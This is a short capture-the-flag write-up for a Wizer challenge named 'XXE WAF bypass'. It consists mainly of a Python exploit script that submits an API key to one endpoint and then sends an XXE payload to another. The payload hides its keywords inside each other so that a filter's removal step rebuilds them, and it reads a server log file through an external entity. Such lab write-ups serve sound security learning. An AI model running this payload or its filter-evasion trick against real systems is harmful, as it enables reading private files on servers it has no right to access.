Wizer - Challenge 65 - XXE WAF bypass

I got the first blood on this challenge!

Exploit

import requests

url = "https://chal65-youb333.vercel.app"

r = requests.post(url + "/getCRMUsers", json={
    "apiKey": "89DHJN3UYFL49FK09KGGGGSS90KFK2390KCFVC12"
})

print(r.text)


# waf removing recursively by order!!
# not going to check again

r = requests.post(url + "/createCard", json={
    "firstName": '"><<!DOCTYPE!ENTITY xxe SYSTEPUBLICM "fiphp://le:///tmp/last_req.log',
    "role": '&xxe;'
})

print(r.text)